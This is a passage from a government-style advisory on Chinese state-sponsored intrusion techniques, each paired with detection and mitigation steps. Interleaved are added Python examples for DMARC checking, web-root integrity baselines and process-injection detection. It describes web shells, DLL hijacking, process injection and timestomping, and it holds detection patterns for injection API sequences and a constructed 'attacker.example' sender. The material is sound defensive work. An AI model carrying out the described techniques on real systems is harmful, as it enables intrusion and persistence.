Threat Actor Procedure(s): Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[1] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. Chinese state-sponsored cyber actors have also been observed:
• Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange® Outlook Web Access (OWA®) and plant webshells.
• Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.
• Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.
Detection and Mitigation Recommendations: Review previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources. Additional mitigations include:
• Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.
• Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).
• Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.
• Disable protocols using weak authentication.
• Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: Embracing a Zero Trust Security Model.
• When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).
• Use automated tools to audit access logs for security concerns.
• Where possible, enforce MFA for password resets.
• Do not include Application Programming Interface (API) keys in software version control systems where they can be unintentionally leaked.
Defensive Tactics and Techniques:
• Harden: Application Hardening [D3-AH]; Platform Hardening / Software Update [D3-SU]
• Detect: File Analysis [D3-FA]; Network Traffic Analysis / Client-server Payload Profiling [D3-CSPP]; Process Analysis / Process Spawn Analysis / Process Lineage Analysis [D3-PLA]
• Isolate: Network Isolation / Inbound Traffic Filtering [D3-ITF]

Threat Actor Technique / Sub-Techniques: Phishing [T1566]: Spearphishing Attachment [T1566.001]; Spearphishing Link [T1566.002]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. These compromise attempts use the cyber actors’ dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.
Detection and Mitigation Recommendations:
• Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and reinforce the appropriate user responses to spearphishing emails.
• Quarantine suspicious files with antivirus solutions.
• Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.
• Block uncommon file types in emails that are not needed by general users (.exe, .jar, .vbs).
• Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using DomainKeys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.
• Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
• Prevent users from clicking on malicious links by stripping hyperlinks or implementing "URL defanging" at the Email Security Gateway or other email security tools.
• Add external sender banners to emails to alert users that the email came from an external sender.
Defensive Tactics and Techniques:
• Harden: Message Hardening / Message Authentication [D3-MAN]; Transfer Agent Authentication [D3-TAAN]
• Detect: File Analysis / Dynamic Analysis [D3-DA]; Identifier Analysis / Homoglyph Detection [D3-HD]; URL Analysis [D3-UA]; Message Analysis / Sender MTA Reputation Analysis [D3-SMRA]; Sender Reputation Analysis [D3-SRA]

Threat Actor Technique / Sub-Techniques: External Remote Services [T1133]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed:
• Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.
• Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).
• Exploiting Internet-accessible web servers using small webshell code injections against multiple code languages, including .NET, asp, aspx, php, jspx, and cfm.
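The SPF/DKIM/DMARC recommendation under Phishing [T1566] above turns on a specific rule: a message passes DMARC only when SPF or DKIM passes for a domain aligned with the visible From: domain, and the domain owner's published policy decides what happens otherwise. The following is an added example and is not from the advisory; it evaluates constructed authentication results against a DMARC record, and its organizational-domain rule is a simplifying assumption (production code should consult the Public Suffix List).

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class AuthResults:
    """Authentication outcome for one inbound message (constructed record format)."""
    from_domain: str             # domain of the visible From: header (RFC 5322.From)
    spf_result: str              # "pass", "fail", "softfail", "none", ...
    spf_domain: str              # domain SPF was evaluated against (MAIL FROM or HELO)
    dkim_result: str             # "pass", "fail", "none", ...
    dkim_domain: Optional[str]   # d= tag of the verified DKIM signature, if any


def parse_dmarc(record: str) -> Dict[str, str]:
    """Parse a DMARC TXT record such as 'v=DMARC1; p=reject; adkim=s; aspf=r'.
    Alignment modes default to relaxed ('r') as the DMARC specification prescribes."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed DMARC tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or tags.get("p") not in ("none", "quarantine", "reject"):
        raise ValueError("not a usable DMARC record")
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    return tags


def org_domain(domain: str) -> str:
    """Organizational domain, simplified to the last two labels. Assumption for this
    example only: production code must use the Public Suffix List (e.g. for co.uk)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(auth_domain: Optional[str], from_domain: str, mode: str) -> bool:
    """Strict alignment needs an exact match; relaxed accepts the same organizational domain."""
    if not auth_domain:
        return False
    a, f = auth_domain.lower().rstrip("."), from_domain.lower().rstrip(".")
    return a == f if mode == "s" else org_domain(a) == org_domain(f)


def evaluate(results: AuthResults, dmarc_record: str) -> Dict[str, object]:
    """Apply DMARC: pass if SPF or DKIM passes AND is aligned with the From: domain.
    On failure the disposition comes from p= (or sp= when From: is a subdomain)."""
    policy = parse_dmarc(dmarc_record)
    spf_aligned = results.spf_result == "pass" and aligned(
        results.spf_domain, results.from_domain, policy["aspf"])
    dkim_aligned = results.dkim_result == "pass" and aligned(
        results.dkim_domain, results.from_domain, policy["adkim"])
    passed = spf_aligned or dkim_aligned
    if passed:
        disposition = "none"
    elif results.from_domain.lower() != org_domain(results.from_domain) and "sp" in policy:
        disposition = policy["sp"]
    else:
        disposition = policy["p"]
    return {"spf_aligned": spf_aligned, "dkim_aligned": dkim_aligned,
            "dmarc": "pass" if passed else "fail", "disposition": disposition}


# Constructed samples: a genuine message, and a masquerading message that spoofs the
# From: domain while passing SPF only for the sender's own bounce domain (not aligned).
GENUINE = AuthResults("corp.example", "pass", "mail.corp.example", "pass", "corp.example")
SPOOFED = AuthResults("corp.example", "pass", "bounce.attacker.example", "none", None)
CORP_RECORD = "v=DMARC1; p=reject; adkim=s; aspf=r"

if __name__ == "__main__":
    for label, msg in (("genuine", GENUINE), ("spoofed", SPOOFED)):
        print(label, evaluate(msg, CORP_RECORD))
```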
Note: refer to the references listed above in Exploit Public-Facing Application [T1190] for information on CVEs known to be exploited by malicious Chinese cyber actors. Note: this technique also applies to Persistence [TA0003].
Detection and Mitigation Recommendations:
• Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.
• Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.
• Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).
• Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.
• Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.
• Review and verify all connections between customer systems, service provider systems, and other client enclaves.
Defensive Tactics and Techniques:
• Harden: Software Update [D3-SU]
• Detect: Network Traffic Analysis / Connection Attempt Analysis [D3-CAA]; Platform Monitoring [D3-PM]; Process Analysis / Process Spawn Analysis [D3-PSA]; Process Lineage Analysis [D3-PLA]

Threat Actor Technique / Sub-Techniques: Valid Accounts [T1078]: Default Accounts [T1078.001]; Domain Accounts [T1078.002]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed gaining credential access into victim networks by using legitimate, but compromised, credentials to access OWA servers, corporate login portals, and victim networks. Note: this technique also applies to Persistence [TA0003], Privilege Escalation [TA0004], and Defense Evasion [TA0005].
Detection and Mitigation Recommendations:
• Adhere to best practices for password and permission management.
• Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only the systems they manage.
• Do not store credentials or sensitive data in plaintext.
• Change all default usernames and passwords.
• Routinely update and secure applications using Secure Shell (SSH).
• Update SSH keys regularly and keep private keys secure.
• Routinely audit privileged accounts to identify malicious use.
Defensive Tactics and Techniques:
• Harden: Credential Hardening / Multi-factor Authentication [D3-MFA]
• Detect: User Behavior Analysis [D3-UBA]; Authentication Event Thresholding [D3-ANET]; Job Function Access Pattern Analysis [D3-JFAPA]

Tactics: Execution [TA0002]

Table IV: Chinese state-sponsored cyber actors’ Execution TTPs with detection and mitigation recommendations (columns: Threat Actor Technique / Sub-Techniques; Threat Actor Procedure(s); Detection and Mitigation Recommendations; Defensive Tactics and Techniques)

Threat Actor Technique / Sub-Techniques: Command and Scripting Interpreter [T1059]: PowerShell® [T1059.001]; Windows® Command Shell [T1059.003]; Unix® Shell [T1059.004]; Python [T1059.006]; JavaScript [T1059.007]; Network Device CLI [T1059.008]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed:
• Using cmd.exe, the JavaScript/JScript interpreter, and network device command line interpreters (CLI).
• Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network.
• Employing Python scripts to exploit vulnerable servers.
• Using a Unix shell in order to conduct discovery, enumeration, and lateral movement on Linux® servers in the victim network.
Detection and Mitigation Recommendations:
PowerShell
• Turn on PowerShell logging. (Note: this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)
• Push PowerShell logs into a security information and event management (SIEM) tool.
• Monitor for suspicious behavior and commands.
• Regularly evaluate and update blocklists and allowlists.
• Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.
• Remove PowerShell if it is not necessary for operations.
• Restrict which commands can be used.
Windows Command Shell
• Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts.
• Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system but are enabled.
• Monitor for and investigate other unusual or suspicious scripting behavior.
Unix
• Use application controls to prevent execution.
• Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. If scripts are not commonly used on a system but are enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious.
Python
• Audit inventory systems for unauthorized Python installations.
• Blocklist Python where not required.
• Prevent users from installing Python where not required.
JavaScript
• Turn off or restrict access to unneeded scripting components.
• Blocklist scripting where appropriate.
• For malicious code served up through ads, adblockers can help prevent that code from executing.
Network Device Command Line Interface (CLI)
• Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.
• Use an authentication, authorization, and accounting (AAA) system to limit the actions administrators can perform and to provide a history of user actions to detect unauthorized use and abuse.
• Ensure least privilege principles are applied to user accounts and groups.
Defensive Tactics and Techniques:
• Harden: Platform Hardening [D3-PH]
• Detect: Process Analysis / Script Execution Analysis [D3-SEA]
• Isolate: Execution Isolation / Executable Allowlisting [D3-EAL]

Threat Actor Technique / Sub-Techniques: Scheduled Task/Job [T1053]: Cron [T1053.003]; Scheduled Task [T1053.005]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as schtasks or crontab, to create and schedule tasks that enumerate victim devices and networks.
Note: this technique also applies to Persistence [TA0003] and Privilege Escalation [TA0004].
Detection and Mitigation Recommendations:
• Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity.
• Configure event logging for scheduled task creation and monitor process execution from svchost.exe (Windows 10) and Windows Task Scheduler (older versions of Windows) to look for changes in %systemroot%\System32\Tasks that do not correlate with known software, patch cycles, or other administrative activity. Additionally, monitor for any scheduled tasks created via command line utilities, such as PowerShell or Windows Management Instrumentation (WMI), that do not conform to typical administrator or user actions.
Defensive Tactics and Techniques:
• Detect: Platform Monitoring / Operating System Monitoring [D3-OSM]; Scheduled Job Analysis [D3-SJA]; System Daemon Monitoring [D3-SDM]; System File Analysis [D3-SFA]
• Isolate: Execution Isolation / Executable Allowlisting [D3-EAL]

Threat Actor Technique / Sub-Techniques: User Execution [T1204]: Malicious Link [T1204.001]; Malicious File [T1204.002]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provides the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.
Detection and Mitigation Recommendations:
• Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.
• Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email.
• Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
• Use a domain reputation service to detect and block suspicious or malicious domains.
• Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
• Ensure all browsers and plugins are kept up to date.
• Use modern browsers with security features turned on.
• Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.
Defensive Tactics and Techniques:
• Detect: File Analysis / Dynamic Analysis [D3-DA]; File Content Rules [D3-FCR]; Identifier Analysis / Homoglyph Detection [D3-HD]; URL Analysis [D3-UA]; Network Traffic Analysis / DNS Traffic Analysis [D3-DNSTA]
• Isolate: Execution Isolation / Hardware-based Process Isolation [D3-HBPI]; Executable Allowlisting [D3-EAL]; Network Isolation / DNS Denylisting [D3-DNSDL]; Outbound Traffic Filtering [D3-OTF]

Tactics: Persistence [TA0003]

Table V: Chinese state-sponsored cyber actors’ Persistence TTPs with detection and mitigation recommendations (columns: Threat Actor Technique / Sub-Techniques; Threat Actor Procedure(s); Detection and Mitigation Recommendations; Defensive Tactics and Techniques)

Threat Actor Technique / Sub-Techniques: Hijack Execution Flow [T1574]: DLL Search Order Hijacking [T1574.001]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. Note: this technique also applies to Privilege Escalation [TA0004] and Defense Evasion [TA0005].
Detection and Mitigation Recommendations:
• Disallow loading of remote DLLs.
• Enable safe DLL search mode.
• Implement tools for detecting search order hijacking opportunities.
• Use application allowlisting to block unknown DLLs.
• Monitor the file system for created, moved, and renamed DLLs.
• Monitor for changes in system DLLs not associated with updates or patches.
• Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).
Defensive Tactics and Techniques:
• Detect: Platform Monitoring / Operating System Monitoring / Service Binary Verification [D3-SBV]; Process Analysis / File Access Pattern Analysis [D3-FAPA]
• Isolate: Execution Isolation / Executable Allowlisting [D3-EAL]

Threat Actor Technique / Sub-Techniques: Modify Authentication Process [T1556]: Domain Controller Authentication [T1556.001]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network. Note: this technique also applies to Defense Evasion [TA0005] and Credential Access [TA0006].
Detection and Mitigation Recommendations:
• Monitor for policy changes to authentication mechanisms used by the domain controller.
• Monitor for modifications to functions exported from authentication DLLs (such as cryptdll.dll and samsrv.dll).
• Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.
• Look for suspicious account behavior across systems that share accounts, whether user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours).
• Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
• Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer.
• Monitor for and correlate changes to Registry entries.
Defensive Tactics and Techniques:
• Detect: Process Analysis [D3-PA]; User Behavior Analysis / Authentication Event Thresholding [D3-ANET]; User Geolocation Logon Pattern Analysis [D3-UGLPA]

Threat Actor Technique / Sub-Techniques: Server Software Component [T1505]: Web Shell [T1505.003]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks.
Detection and Mitigation Recommendations:
• Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.
• Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.
• Perform integrity checks on critical servers to identify and investigate unexpected changes.
• Have application developers sign their code using digital signatures to verify their identity.
• Identify and remediate web application vulnerabilities or configuration weaknesses.
• Employ regular updates to applications and host operating systems.
• Implement a least-privilege policy on web servers to reduce adversaries’ ability to escalate privileges or pivot laterally to other hosts, and control creation and execution of files in particular directories.
• If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.
• Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.
• Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.
• Establish, and back up offline, a “known good” version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.
• Employ user input validation to restrict exploitation of vulnerabilities.
• Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.
• Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.
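Two of the web shell recommendations above, integrity checks on critical servers and a "known good" baseline kept offline to monitor servable content, reduce to hashing the web root and diffing it against the stored baseline. The following is an added example and is not from the advisory; it builds a constructed web root in a temporary directory, records a baseline, then flags a dropped file and an altered library.

```python
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List


def sha256_file(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Map every regular file under root (relative POSIX path) to its SHA-256.
    Symlinks are skipped so a link planted into the web root cannot mask a change."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and not p.is_symlink()
    }


def save_baseline(baseline: Dict[str, str], path: Path) -> None:
    """Persist the known-good baseline; keep this copy off the web server (offline)."""
    Path(path).write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(path: Path) -> Dict[str, str]:
    return json.loads(Path(path).read_text())


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files that appeared, disappeared, or changed content since the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> Dict[str, List[str]]:
    """Build a constructed web root, take a baseline, then simulate an unexpected
    new file and a modified library and return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "wwwroot"
        (root / "app").mkdir(parents=True)
        (root / "index.php").write_text("<?php echo 'constructed sample'; ?>\n")
        (root / "app" / "lib.php").write_text("<?php function helper() {} ?>\n")
        baseline_path = Path(tmp) / "baseline.json"     # would live offline in practice
        save_baseline(build_baseline(root), baseline_path)

        # Changes a defender would want flagged: a file dropped into the web root
        # outside the change process, and an existing file altered in place.
        (root / "app" / "unexpected.php").write_text("constructed placeholder content\n")
        (root / "app" / "lib.php").write_text("<?php function helper() {} function extra() {} ?>\n")

        return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```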
Defensive Tactics and Techniques:
• Detect: Network Traffic Analysis / Client-server Payload Profiling [D3-CSPP]; Per Host Download-Upload Ratio Analysis [D3-PHDURA]; Process Analysis / Process Spawn Analysis / Process Lineage Analysis [D3-PLA]
• Isolate: Network Isolation / Inbound Traffic Filtering [D3-ITF]

Threat Actor Technique / Sub-Techniques: Create or Modify System Process [T1543]: Windows Service [T1543.003]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence. Note: this technique also applies to Privilege Escalation [TA0004].
Detection and Mitigation Recommendations:
• Only allow authorized administrators to make service changes and modify service configurations.
• Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.
• Monitor WMI and PowerShell for service modifications.
Defensive Tactics and Techniques:
• Detect: Process Analysis / Process Spawn Analysis [D3-PSA]

Tactics: Privilege Escalation [TA0004]

Table VI: Chinese state-sponsored cyber actors’ Privilege Escalation TTPs with detection and mitigation recommendations (columns: Threat Actor Technique / Sub-Techniques; Threat Actor Procedure(s); Detection and Mitigation Recommendations; Defensive Tactics and Techniques)

Threat Actor Technique / Sub-Techniques: Domain Policy Modification [T1484]: Group Policy Modification [T1484.001]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation. Note: this technique also applies to Defense Evasion [TA0005].
Detection and Mitigation Recommendations:
• Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.
• Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.
• Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.
Defensive Tactics and Techniques:
• Detect: Network Traffic Analysis / Administrative Network Activity Analysis [D3-ANAA]; Platform Monitoring / Operating System Monitoring / System File Analysis [D3-SFA]

Threat Actor Technique / Sub-Techniques: Process Injection [T1055]: Dynamic Link Library Injection [T1055.001]; Portable Executable Injection [T1055.002]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed:
• Injecting into the rundll32.exe process to hide usage of Mimikatz, as well as injecting into a running legitimate explorer.exe process for lateral movement.
• Using shellcode that injects implants into newly created instances of the Service Host process (svchost).
Note: this technique also applies to Defense Evasion [TA0005].
Detection and Mitigation Recommendations:
• Use endpoint protection software to block process injection based on behavior of the injection process.
• Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
• Monitor for suspicious sequences of Windows API calls such as CreateRemoteThread, VirtualAllocEx, or WriteProcessMemory, and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.
• To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need them; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; and harden the local security authority (LSA) to prevent code injection.
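The "suspicious sequences of Windows API calls" recommendation above is most useful as an ordered, cross-process rule: VirtualAllocEx, then WriteProcessMemory, then CreateRemoteThread from one process against another within a short window. The following is an added example and is not from the advisory; it runs that rule over constructed API-call telemetry, and the record format is an assumption standing in for whatever an EDR or ETW sensor emits.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# The cross-process call sequence the advisory says to watch for, in the order an
# injector needs it: reserve memory in the target, write into it, start a thread there.
INJECTION_SEQUENCE = ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")


@dataclass(frozen=True)
class ApiEvent:
    """One API-call telemetry record from an EDR/ETW-style sensor (constructed format)."""
    ts: float
    pid: int
    image: str          # calling process image name
    api: str
    target_pid: int     # process whose handle the call operated on
    target_image: str


def _first_after(events: List[ApiEvent], api: str, not_before: float) -> Optional[ApiEvent]:
    for e in events:
        if e.api == api and e.ts >= not_before:
            return e
    return None


def find_injection_chains(events: List[ApiEvent], window: float = 30.0) -> List[Dict[str, object]]:
    """Return one finding per (caller, target) pair where the full sequence occurs in order
    within `window` seconds. Calls a process makes on itself are ignored."""
    by_pair: Dict[Tuple[int, int], List[ApiEvent]] = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev.ts):
        if e.pid != e.target_pid:
            by_pair[(e.pid, e.target_pid)].append(e)

    findings: List[Dict[str, object]] = []
    for (pid, target_pid), evs in by_pair.items():
        chain: List[ApiEvent] = []
        not_before = float("-inf")
        for api in INJECTION_SEQUENCE:
            hit = _first_after(evs, api, not_before)
            if hit is None:
                break
            chain.append(hit)
            not_before = hit.ts
        if len(chain) == len(INJECTION_SEQUENCE) and chain[-1].ts - chain[0].ts <= window:
            findings.append({
                "pid": pid, "image": chain[0].image,
                "target_pid": target_pid, "target_image": chain[0].target_image,
                "start": chain[0].ts, "end": chain[-1].ts,
            })
    return findings


# Constructed telemetry: an unknown binary completes the sequence against explorer.exe
# within a second; a debugger allocates and writes but never starts a remote thread; a
# third process issues all three calls but hours apart, outside the default window.
SAMPLE_EVENTS = [
    ApiEvent(100.0, 4412, "updater.exe", "VirtualAllocEx", 1180, "explorer.exe"),
    ApiEvent(100.4, 4412, "updater.exe", "WriteProcessMemory", 1180, "explorer.exe"),
    ApiEvent(101.0, 4412, "updater.exe", "CreateRemoteThread", 1180, "explorer.exe"),
    ApiEvent(200.0, 900, "debugger.exe", "VirtualAllocEx", 950, "app.exe"),
    ApiEvent(201.0, 900, "debugger.exe", "WriteProcessMemory", 950, "app.exe"),
    ApiEvent(300.0, 700, "tool.exe", "VirtualAllocEx", 710, "svchost.exe"),
    ApiEvent(4000.0, 700, "tool.exe", "WriteProcessMemory", 710, "svchost.exe"),
    ApiEvent(8000.0, 700, "tool.exe", "CreateRemoteThread", 710, "svchost.exe"),
]

if __name__ == "__main__":
    for f in find_injection_chains(SAMPLE_EVENTS):
        print(f"{f['image']} (pid {f['pid']}) -> {f['target_image']} (pid {f['target_pid']}) "
              f"between t={f['start']} and t={f['end']}")
```

Tune the window to the sensor's timestamp resolution and legitimate tooling in the environment (debuggers and some installers touch other processes too), and use the finding as a pivot into the process's network and file activity as the advisory suggests.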
Defensive Tactics and Techniques:
• Isolate: Execution Isolation / Hardware-based Process Isolation [D3-HBPI]; Mandatory Access Control [D3-MAC]

Tactics: Defense Evasion [TA0005]

Table VII: Chinese state-sponsored cyber actors’ Defense Evasion TTPs with detection and mitigation recommendations (columns: Threat Actor Technique / Sub-Techniques; Threat Actor Procedure(s); Detection and Mitigation Recommendations; Defensive Tactics and Techniques)

Threat Actor Technique / Sub-Techniques: Deobfuscate/Decode Files or Information [T1140]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.
Detection and Mitigation Recommendations:
• Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
• Consider blocking, disabling, or monitoring use of 7-Zip.
Defensive Tactics and Techniques:
• Detect: Process Analysis / Process Spawn Analysis [D3-PSA]
• Isolate: Execution Isolation / Executable Denylisting [D3-EDL]

Threat Actor Technique / Sub-Techniques: Hide Artifacts [T1564]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.
Detection and Mitigation Recommendations:
• Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.
• Monitor event and authentication logs for records of hidden artifacts being used.
• Monitor the file system and shell commands for hidden attribute usage.
Defensive Tactics and Techniques:
• Detect: Process Analysis / File Access Pattern Analysis [D3-FAPA]
• Isolate: Execution Isolation / Executable Allowlisting [D3-EAL]

Threat Actor Technique / Sub-Techniques: Indicator Removal on Host [T1070]
Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed deleting files using rm or del commands. Several files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.
        Detection and mitigation recommendations: Make the environment variables associated with command history read-only to ensure that the history is preserved. Recognize timestomping by monitoring the contents of important directories and the attributes of the files. Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their ~/.bash_history or ConsoleHost_history.txt files. Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure-deletion tools that are not already on systems within the enterprise network and that an adversary could introduce. Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise, and inconsistencies between file timestamps and previous handles opened to them can serve as a detection rule.
        Defensive tactics and techniques: Detect: Platform Monitoring: Operating System Monitoring: System File Analysis [D3-SFA]; Process Analysis: File Access Pattern Analysis [D3-FAPA]; Isolate: Execution Isolation: Executable Allowlisting [D3-EAL]

    Obfuscated Files or Information [T1027]
        Threat actor procedure(s): Chinese state-sponsored cyber actors were observed Base64-encoding files and command strings to evade security measures.
        Detection and mitigation recommendations: Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after they have been processed/interpreted.
        Defensive tactics and techniques: Detect: Process Analysis: File Access Pattern Analysis [D3-FAPA]

    Signed Binary Proxy Execution [T1218]: Mshta [T1218.005], Rundll32 [T1218.011]
        Threat actor procedure(s): Chinese state-sponsored cyber actors were observed using Microsoft-signed binaries, such as Rundll32, as a proxy to execute malicious payloads.
        Detection and mitigation recommendations: Monitor processes for the execution of known proxy binaries (e.g., rundll32.exe) and look for anomalous activity that does not follow the historically known-good arguments and loaded DLLs associated with the invocation of the binary.
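The two file-system rules from the Indicator Removal from Host row above (timestamps that contradict recorded write handles, and files that a process created and a deletion command later removed), as an added example that is not part of the CISA advisory. The handle log, directory snapshots and process records are constructed stand-ins for file-integrity and EDR telemetry, and their field layout is an assumption.

```python
"""Two rules from the advisory's Indicator Removal from Host guidance:
(1) a file whose current modification time is older than the last write handle
    a file monitor recorded for it has had its timestamp rolled back
    (timestomping);
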